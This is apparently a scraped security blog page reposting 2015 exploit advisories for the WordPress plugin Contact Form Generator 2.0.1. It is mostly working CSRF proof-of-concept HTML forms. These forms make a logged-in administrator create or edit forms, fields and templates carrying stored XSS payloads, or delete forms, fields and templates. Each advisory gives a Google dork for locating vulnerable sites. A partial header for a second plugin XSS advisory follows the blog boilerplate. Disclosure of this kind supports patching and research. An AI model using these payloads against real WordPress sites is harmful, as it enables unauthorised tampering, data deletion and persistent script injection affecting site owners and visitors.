<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update field for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
form field creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form field: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
================================
Field form creation [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value=">"<img src=x>" />
<input type="hidden" name="id_form" value="8" /> <!-- an existing form id value for this element -->
<input type="hidden" name="id_type" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a field" />
</form>
</body>
<!--
================================
Field form update [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="tooltip_text" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="id_form" value="3" /> <!-- an existing form id value -->
<input type="hidden" name="id_type" value="1" />
<input type="hidden" name="column_type" value="0" />
<input type="hidden" name="required" value="0" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="width" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="field_margin_top" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="7" /> <!-- field id to edit -->
<input type="submit" value="Click me for update a field" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
=========================
Create form [CSRF PoC ]
=========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA"><img src=1><" />
<input type="hidden" name="top_text" value="xds"><img src=2><" />
<input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
<input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
<input type="hidden" name="send_text" value="Send"><img src=5><" />
<input type="hidden" name="send_new_text" value="New email"><img src=6><" />
<input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
<input type="hidden" name="form_width" value="100%"><img src=8><" />
<input type="hidden" name="id_template" value="0" />
<input type="hidden" name="email_to" value=""><img src=9><" />
<input type="hidden" name="email_bcc" value=""><img src=10><" />
<input type="hidden" name="email_subject" value=""><img src=11><" />
<input type="hidden" name="email_from" value=""><img src=12><" />
<input type="hidden" name="email_from_name" value=""><img src=13><" />
<input type="hidden" name="email_replyto" value=""><img src=14><" />
<input type="hidden" name="email_replyto_name" value=""><img src=15><" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
<input type="hidden" name="redirect_url" value=""><img src=16><" />
<input type="hidden" name="redirect_delay" value="0" />
<input type="hidden" name="send_copy_enable" value="1" />
<input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
<input type="hidden" name="shake_count" value="2" />
<input type="hidden" name="shake_distanse" value="10" />
<input type="hidden" name="shake_duration" value="300" />
<input type="hidden" name="email_info_show_referrer" value="1" />
<input type="hidden" name="email_info_show_ip" value="1" />
<input type="hidden" name="email_info_show_browser" value="1" />
<input type="hidden" name="email_info_show_os" value="1" />
<input type="hidden" name="email_info_show_sc_res" value="1" />
<input type="hidden" name="show_back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a form" />
</form>
</body>
<!--
==========================
Update form [CSRF PoC ]
==========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA"><img src=1><" />
<input type="hidden" name="top_text" value="xds"><img src=2><" />
<input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
<input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
<input type="hidden" name="send_text" value="Send"><img src=5><" />
<input type="hidden" name="send_new_text" value="New email"><img src=6><" />
<input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
<input type="hidden" name="form_width" value="100%"><img src=8><" />
<input type="hidden" name="id_template" value="0" />
<input type="hidden" name="email_to" value=""><img src=9><" />
<input type="hidden" name="email_bcc" value=""><img src=10><" />
<input type="hidden" name="email_subject" value=""><img src=11><" />
<input type="hidden" name="email_from" value=""><img src=12><" />
<input type="hidden" name="email_from_name" value=""><img src=13><" />
<input type="hidden" name="email_replyto" value=""><img src=14><" />
<input type="hidden" name="email_replyto_name" value=""><img src=15><" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
<input type="hidden" name="redirect_url" value=""><img src=16><" />
<input type="hidden" name="redirect_delay" value="0" />
<input type="hidden" name="send_copy_enable" value="1" />
<input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
<input type="hidden" name="shake_count" value="2" />
<input type="hidden" name="shake_distanse" value="10" />
<input type="hidden" name="shake_duration" value="300" />
<input type="hidden" name="email_info_show_referrer" value="1" />
<input type="hidden" name="email_info_show_ip" value="1" />
<input type="hidden" name="email_info_show_browser" value="1" />
<input type="hidden" name="email_info_show_os" value="1" />
<input type="hidden" name="email_info_show_sc_res" value="1" />
<input type="hidden" name="show_back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for edit form" />
</form>
</body>
</html>
<!--
===========
TIMELINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update template for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new template and inject HTML / JS code
without knowing.
Update template: when the victim accesses the link, will update information of the template identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
==============================
create a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="xsa"><img src=x>" /> <!-- persistent form name [XSS] -->
<input type="hidden" name="published" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for add new template" />
</form>
</body>
<!--
==============================
edit a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value=""><img src=x>" />
<input type="hidden" name="styles[587]" value=""><img src=x>" />
<input type="hidden" name="styles[588]" value=""><img src=x>" />
<input type="hidden" name="styles[131]" value="inherit" />
<input type="hidden" name="styles[589]" value="1" />
<input type="hidden" name="styles[629]" value="dark-thin" />
<input type="hidden" name="styles[630]" value="dark-thin" />
<input type="hidden" name="styles[627]" value="0" />
<input type="hidden" name="styles[0]" value=""><img src=x>" />
<input type="hidden" name="styles[130]" value=""><img src=x>" />
<input type="hidden" name="styles[517]" value=""><img src=x>" />
<input type="hidden" name="styles[518]" value=""><img src=x>" />
<input type="hidden" name="styles[1]" value=""><img src=x>" />
<input type="hidden" name="styles[2]" value=""><img src=x>" />
<input type="hidden" name="styles[3]" value="solid" />
<input type="hidden" name="styles[4]" value=""><img src=x>" />
<input type="hidden" name="styles[5]" value=""><img src=x>" />
<input type="hidden" name="styles[6]" value=""><img src=x>" />
<input type="hidden" name="styles[7]" value=""><img src=x>" />
<input type="hidden" name="styles[8]" value=""><img src=x>" />
<input type="hidden" name="styles[9]" value=""><img src=x>" />
<input type="hidden" name="styles[10]" value=""><img src=x>" />
<input type="hidden" name="styles[11]" value=""><img src=x>" />
<input type="hidden" name="styles[12]" value=""><img src=x>" />
<input type="hidden" name="styles[13]" value=""><img src=x>" />
<input type="hidden" name="styles[14]" value=""><img src=x>" />
<input type="hidden" name="styles[15]" value=""><img src=x>" />
<input type="hidden" name="styles[16]" value=""><img src=x>" />
<input type="hidden" name="styles[17]" value=""><img src=x>" />
<input type="hidden" name="styles[18]" value=""><img src=x>" />
<input type="hidden" name="styles[19]" value=""><img src=x>" />
<input type="hidden" name="styles[600]" value="0" />
<input type="hidden" name="styles[601]" value=""><img src=x>" />
<input type="hidden" name="styles[602]" value=""><img src=x>" />
<input type="hidden" name="styles[603]" value=""><img src=x>" />
<input type="hidden" name="styles[604]" value=""><img src=x>" />
<input type="hidden" name="styles[605]" value=""><img src=x>" />
<input type="hidden" name="styles[606]" value=""><img src=x>" />
<input type="hidden" name="styles[607]" value=""><img src=x>" />
<input type="hidden" name="styles[608]" value="solid" />
<input type="hidden" name="styles[609]" value=""><img src=x>" />
<input type="hidden" name="styles[610]" value="0" />
<input type="hidden" name="styles[611]" value=""><img src=x>" />
<input type="hidden" name="styles[612]" value=""><img src=x>" />
<input type="hidden" name="styles[613]" value=""><img src=x>" />
<input type="hidden" name="styles[614]" value=""><img src=x>" />
<input type="hidden" name="styles[615]" value=""><img src=x>" />
<input type="hidden" name="styles[616]" value=""><img src=x>" />
<input type="hidden" name="styles[617]" value="0" />
<input type="hidden" name="styles[618]" value=""><img src=x>" />
<input type="hidden" name="styles[619]" value=""><img src=x>" />
<input type="hidden" name="styles[620]" value=""><img src=x>" />
<input type="hidden" name="styles[621]" value=""><img src=x>" />
<input type="hidden" name="styles[622]" value=""><img src=x>" />
<input type="hidden" name="styles[623]" value=""><img src=x>" />
<input type="hidden" name="styles[624]" value=""><img src=x>" />
<input type="hidden" name="styles[625]" value="solid" />
<input type="hidden" name="styles[626]" value=""><img src=x>" />
<input type="hidden" name="styles[20]" value=""><img src=x>" />
<input type="hidden" name="styles[21]" value=""><img src=x>" />
<input type="hidden" name="styles[22]" value="normal" />
<input type="hidden" name="styles[23]" value="normal" />
<input type="hidden" name="styles[24]" value="none" />
<input type="hidden" name="styles[25]" value="left" />
<input type="hidden" name="styles[506]" value="inherit" />
<input type="hidden" name="styles[510]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[27]" value=""><img src=x>" />
<input type="hidden" name="styles[28]" value=""><img src=x>" />
<input type="hidden" name="styles[29]" value=""><img src=x>" />
<input type="hidden" name="styles[30]" value=""><img src=x>" />
<input type="hidden" name="styles[190]" value=""><img src=x>" />
<input type="hidden" name="styles[191]" value=""><img src=x>" />
<input type="hidden" name="styles[192]" value=""><img src=x>" />
<input type="hidden" name="styles[502]" value="left" />
<input type="hidden" name="styles[193]" value=""><img src=x>" />
<input type="hidden" name="styles[194]" value=""><img src=x>" />
<input type="hidden" name="styles[195]" value=""><img src=x>" />
<input type="hidden" name="styles[196]" value="solid" />
<input type="hidden" name="styles[197]" value=""><img src=x>" />
<input type="hidden" name="styles[198]" value=""><img src=x>" />
<input type="hidden" name="styles[199]" value="normal" />
<input type="hidden" name="styles[200]" value="normal" />
<input type="hidden" name="styles[201]" value="none" />
<input type="hidden" name="styles[202]" value="inherit" />
<input type="hidden" name="styles[511]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[203]" value=""><img src=x>" />
<input type="hidden" name="styles[204]" value=""><img src=x>" />
<input type="hidden" name="styles[205]" value=""><img src=x>" />
<input type="hidden" name="styles[206]" value=""><img src=x>" />
<input type="hidden" name="styles[215]" value=""><img src=x>" />
<input type="hidden" name="styles[216]" value=""><img src=x>" />
<input type="hidden" name="styles[217]" value=""><img src=x>" />
<input type="hidden" name="styles[218]" value=""><img src=x>" />
<input type="hidden" name="styles[31]" value=""><img src=x>" />
<input type="hidden" name="styles[32]" value=""><img src=x>" />
<input type="hidden" name="styles[33]" value="normal" />
<input type="hidden" name="styles[34]" value="normal" />
<input type="hidden" name="styles[35]" value="none" />
<input type="hidden" name="styles[36]" value="left" />
<input type="hidden" name="styles[507]" value="inherit" />
<input type="hidden" name="styles[512]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[37]" value=""><img src=x>" />
<input type="hidden" name="styles[38]" value=""><img src=x>" />
<input type="hidden" name="styles[39]" value=""><img src=x>" />
<input type="hidden" name="styles[40]" value=""><img src=x>" />
<input type="hidden" name="styles[41]" value=""><img src=x>" />
<input type="hidden" name="styles[42]" value=""><img src=x>" />
<input type="hidden" name="styles[43]" value="normal" />
<input type="hidden" name="styles[44]" value="normal" />
<input type="hidden" name="styles[509]" value="inherit" />
<input type="hidden" name="styles[46]" value=""><img src=x>" />
<input type="hidden" name="styles[47]" value=""><img src=x>" />
<input type="hidden" name="styles[48]" value=""><img src=x>" />
<input type="hidden" name="styles[49]" value=""><img src=x>" />
<input type="hidden" name="styles[505]" value="white" />
<input type="hidden" name="styles[508]" value="inherit" />
<input type="hidden" name="styles[132]" value=""><img src=x>" />
<input type="hidden" name="styles[133]" value=""><img src=x>" />
<input type="hidden" name="styles[168]" value=""><img src=x>" />
<input type="hidden" name="styles[519]" value=""><img src=x>" />
<input type="hidden" name="styles[520]" value=""><img src=x>" />
<input type="hidden" name="styles[500]" value="left" />
<input type="hidden" name="styles[501]" value="left" />
<input type="hidden" name="styles[134]" value=""><img src=x>" />
<input type="hidden" name="styles[135]" value=""><img src=x>" />
<input type="hidden" name="styles[136]" value="solid" />
<input type="hidden" name="styles[137]" value=""><img src=x>" />
<input type="hidden" name="styles[138]" value=""><img src=x>" />
<input type="hidden" name="styles[139]" value=""><img src=x>" />
<input type="hidden" name="styles[140]" value=""><img src=x>" />
<input type="hidden" name="styles[141]" value=""><img src=x>" />
<input type="hidden" name="styles[142]" value=""><img src=x>" />
<input type="hidden" name="styles[143]" value=""><img src=x>" />
<input type="hidden" name="styles[144]" value=""><img src=x>" />
<input type="hidden" name="styles[145]" value=""><img src=x>" />
<input type="hidden" name="styles[146]" value=""><img src=x>" />
<input type="hidden" name="styles[147]" value=""><img src=x>" />
<input type="hidden" name="styles[148]" value=""><img src=x>" />
<input type="hidden" name="styles[149]" value="normal" />
<input type="hidden" name="styles[150]" value="normal" />
<input type="hidden" name="styles[151]" value="none" />
<input type="hidden" name="styles[152]" value="inherit" />
<input type="hidden" name="styles[153]" value=""><img src=x>" />
<input type="hidden" name="styles[154]" value=""><img src=x>" />
<input type="hidden" name="styles[155]" value=""><img src=x>" />
<input type="hidden" name="styles[156]" value=""><img src=x>" />
<input type="hidden" name="styles[157]" value=""><img src=x>" />
<input type="hidden" name="styles[158]" value=""><img src=x>" />
<input type="hidden" name="styles[159]" value=""><img src=x>" />
<input type="hidden" name="styles[160]" value=""><img src=x>" />
<input type="hidden" name="styles[161]" value=""><img src=x>" />
<input type="hidden" name="styles[162]" value=""><img src=x>" />
<input type="hidden" name="styles[163]" value=""><img src=x>" />
<input type="hidden" name="styles[164]" value=""><img src=x>" />
<input type="hidden" name="styles[165]" value=""><img src=x>" />
<input type="hidden" name="styles[166]" value=""><img src=x>" />
<input type="hidden" name="styles[167]" value=""><img src=x>" />
<input type="hidden" name="styles[513]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[176]" value=""><img src=x>" />
<input type="hidden" name="styles[177]" value=""><img src=x>" />
<input type="hidden" name="styles[178]" value=""><img src=x>" />
<input type="hidden" name="styles[179]" value=""><img src=x>" />
<input type="hidden" name="styles[180]" value=""><img src=x>" />
<input type="hidden" name="styles[181]" value=""><img src=x>" />
<input type="hidden" name="styles[182]" value=""><img src=x>" />
<input type="hidden" name="styles[183]" value=""><img src=x>" />
<input type="hidden" name="styles[184]" value=""><img src=x>" />
<input type="hidden" name="styles[185]" value=""><img src=x>" />
<input type="hidden" name="styles[186]" value=""><img src=x>" />
<input type="hidden" name="styles[187]" value=""><img src=x>" />
<input type="hidden" name="styles[188]" value=""><img src=x>" />
<input type="hidden" name="styles[189]" value=""><img src=x>" />
<input type="hidden" name="styles[171]" value=""><img src=x>" />
<input type="hidden" name="styles[514]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[172]" value=""><img src=x>" />
<input type="hidden" name="styles[173]" value=""><img src=x>" />
<input type="hidden" name="styles[174]" value=""><img src=x>" />
<input type="hidden" name="styles[175]" value=""><img src=x>" />
<input type="hidden" name="styles[169]" value=""><img src=x>" />
<input type="hidden" name="styles[521]" value=""><img src=x>" />
<input type="hidden" name="styles[522]" value=""><img src=x>" />
<input type="hidden" name="styles[170]" value=""><img src=x>" />
<input type="hidden" name="styles[523]" value=""><img src=x>" />
<input type="hidden" name="styles[535]" value=""><img src=x>" />
<input type="hidden" name="styles[536]" value=""><img src=x>" />
<input type="hidden" name="styles[537]" value=""><img src=x>" />
<input type="hidden" name="styles[538]" value=""><img src=x>" />
<input type="hidden" name="styles[539]" value=""><img src=x>" />
<input type="hidden" name="styles[540]" value=""><img src=x>" />
<input type="hidden" name="styles[541]" value=""><img src=x>" />
<input type="hidden" name="styles[542]" value=""><img src=x>" />
<input type="hidden" name="styles[543]" value=""><img src=x>" />
<input type="hidden" name="styles[544]" value=""><img src=x>" />
<input type="hidden" name="styles[545]" value=""><img src=x>" />
<input type="hidden" name="styles[546]" value=""><img src=x>" />
<input type="hidden" name="styles[547]" value="solid" />
<input type="hidden" name="styles[548]" value=""><img src=x>" />
<input type="hidden" name="styles[549]" value=""><img src=x>" />
<input type="hidden" name="styles[550]" value=""><img src=x>" />
<input type="hidden" name="styles[551]" value=""><img src=x>" />
<input type="hidden" name="styles[524]" value=""><img src=x>" />
<input type="hidden" name="styles[525]" value=""><img src=x>" />
<input type="hidden" name="styles[526]" value="normal" />
<input type="hidden" name="styles[527]" value="normal" />
<input type="hidden" name="styles[528]" value="none" />
<input type="hidden" name="styles[529]" value="inherit" />
<input type="hidden" name="styles[530]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[531]" value=""><img src=x>" />
<input type="hidden" name="styles[532]" value=""><img src=x>" />
<input type="hidden" name="styles[533]" value=""><img src=x>" />
<input type="hidden" name="styles[534]" value=""><img src=x>" />
<input type="hidden" name="styles[91]" value=""><img src=x>" />
<input type="hidden" name="styles[50]" value=""><img src=x>" />
<input type="hidden" name="styles[212]" value="left" />
<input type="hidden" name="styles[92]" value=""><img src=x>" />
<input type="hidden" name="styles[93]" value=""><img src=x>" />
<input type="hidden" name="styles[209]" value=""><img src=x>" />
<input type="hidden" name="styles[100]" value=""><img src=x>" />
<input type="hidden" name="styles[101]" value=""><img src=x>" />
<input type="hidden" name="styles[127]" value="solid" />
<input type="hidden" name="styles[102]" value=""><img src=x>" />
<input type="hidden" name="styles[103]" value=""><img src=x>" />
<input type="hidden" name="styles[104]" value=""><img src=x>" />
<input type="hidden" name="styles[105]" value=""><img src=x>" />
<input type="hidden" name="styles[94]" value=""><img src=x>" />
<input type="hidden" name="styles[95]" value=""><img src=x>" />
<input type="hidden" name="styles[96]" value=""><img src=x>" />
<input type="hidden" name="styles[97]" value=""><img src=x>" />
<input type="hidden" name="styles[98]" value=""><img src=x>" />
<input type="hidden" name="styles[99]" value=""><img src=x>" />
<input type="hidden" name="styles[106]" value=""><img src=x>" />
<input type="hidden" name="styles[107]" value=""><img src=x>" />
<input type="hidden" name="styles[108]" value="normal" />
<input type="hidden" name="styles[109]" value="normal" />
<input type="hidden" name="styles[110]" value="none" />
<input type="hidden" name="styles[112]" value="inherit" />
<input type="hidden" name="styles[515]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[113]" value=""><img src=x>" />
<input type="hidden" name="styles[114]" value=""><img src=x>" />
<input type="hidden" name="styles[115]" value=""><img src=x>" />
<input type="hidden" name="styles[116]" value=""><img src=x>" />
<input type="hidden" name="styles[51]" value=""><img src=x>" />
<input type="hidden" name="styles[52]" value=""><img src=x>" />
<input type="hidden" name="styles[124]" value=""><img src=x>" />
<input type="hidden" name="styles[516]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[125]" value=""><img src=x>" />
<input type="hidden" name="styles[126]" value=""><img src=x>" />
<input type="hidden" name="styles[117]" value=""><img src=x>" />
<input type="hidden" name="styles[118]" value=""><img src=x>" />
<input type="hidden" name="styles[119]" value=""><img src=x>" />
<input type="hidden" name="styles[120]" value=""><img src=x>" />
<input type="hidden" name="styles[121]" value=""><img src=x>" />
<input type="hidden" name="styles[122]" value=""><img src=x>" />
<input type="hidden" name="styles[552]" value="1" />
<input type="hidden" name="styles[553]" value=""><img src=x>" />
<input type="hidden" name="styles[554]" value=""><img src=x>" />
<input type="hidden" name="styles[555]" value="normal" />
<input type="hidden" name="styles[556]" value="normal" />
<input type="hidden" name="styles[596]" value="none" />
<input type="hidden" name="styles[590]" value=""><img src=x>" />
<input type="hidden" name="styles[591]" value="solid" />
<input type="hidden" name="styles[592]" value=""><img src=x>" />
<input type="hidden" name="styles[558]" value=""><img src=x>" />
<input type="hidden" name="styles[559]" value=""><img src=x>" />
<input type="hidden" name="styles[560]" value=""><img src=x>" />
<input type="hidden" name="styles[561]" value=""><img src=x>" />
<input type="hidden" name="styles[563]" value="1" />
<input type="hidden" name="styles[562]" value="1" />
<input type="hidden" name="styles[597]" value=""><img src=x>" />
<input type="hidden" name="styles[598]" value=""><img src=x>" />
<input type="hidden" name="styles[564]" value=""><img src=x>" />
<input type="hidden" name="styles[565]" value="normal" />
<input type="hidden" name="styles[566]" value="normal" />
<input type="hidden" name="styles[594]" value="none" />
<input type="hidden" name="styles[567]" value=""><img src=x>" />
<input type="hidden" name="styles[568]" value="solid" />
<input type="hidden" name="styles[569]" value=""><img src=x>" />
<input type="hidden" name="styles[570]" value=""><img src=x>" />
<input type="hidden" name="styles[571]" value=""><img src=x>" />
<input type="hidden" name="styles[572]" value=""><img src=x>" />
<input type="hidden" name="styles[573]" value=""><img src=x>" />
<input type="hidden" name="styles[574]" value=""><img src=x>" />
<input type="hidden" name="styles[595]" value="none" />
<input type="hidden" name="styles[575]" value=""><img src=x>" />
<input type="hidden" name="styles[576]" value=""><img src=x>" />
<input type="hidden" name="styles[577]" value=""><img src=x>" />
<input type="hidden" name="styles[578]" value=""><img src=x>" />
<input type="hidden" name="styles[579]" value=""><img src=x>" />
<input type="hidden" name="styles[580]" value=""><img src=x>" />
<input type="hidden" name="styles[581]" value="normal" />
<input type="hidden" name="styles[582]" value="normal" />
<input type="hidden" name="styles[593]" value="none" />
<input type="hidden" name="styles[583]" value=""><img src=x>" />
<input type="hidden" name="styles[584]" value=""><img src=x>" />
<input type="hidden" name="styles[585]" value=""><img src=x>" />
<input type="hidden" name="styles[586]" value=""><img src=x>" />
<input type="hidden" name="styles[599]" value=""><img src=x>" />
<input type="hidden" name="styles[628]" value=""><img src=x>" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="2" /> <!-- template id to edit -->
<input type="submit" value="Click me for update template" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (delete) Cross-site Request Forgery (CSRF) issues
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
==============
Description
==============
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin,
making the victim administrator user deletes a form (PoC # 1), delete a form element (PoC # 2), or delete an existing template (PoC # 3).
-->
<!--
===============================
delete a form [CSRF PoC #1]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms" method="POST">
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_search" value="" />
<!-- form id value.. -->
<input type="hidden" name="ids[]" value="2" />
<!-- end -->
<input type="hidden" name="task" value="delete" />
<input type="submit" value="Delete form(s)" />
</form>
</body>
<!--
===============================
delete a field [CSRF PoC #2]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_fields" method="POST">
<input type="hidden" name="filter_form" value="3" />
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_type" value="0" />
<input type="hidden" name="filter_search" value="" />
<!-- fields ids to delete -->
<input type="hidden" name="ids[]" value="9" />
<input type="hidden" name="ids[]" value="10" />
<!-- end list -->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids[]" value="" />
<input type="submit" value="delete field(s)" />
</form>
</body>
<!--
==================================
delete a template [CSRF PoC #3]
==================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_templates" method="POST">
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_search" value="" />
<!-- an existing template id(s) to delete -->
<input type="hidden" name="ids[]" value="1" />
<!--end-->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids[]" value="" />
<input type="submit" value="Delete template(s)" />
</form>
</body>
<!---
===========
TIME-LINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
->
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141680
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: gx1 <gaetano.perrone[at]secsi.io>
# Vulnerability Discovery: Gaetano Perrone
# Vendor Homepage: https://www.crmperks.com/
# Software Link: https://wordpress.org/plugins/contact-form-entries/
# Version: < 1.1.7
# Tested on: any
# References:
* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac
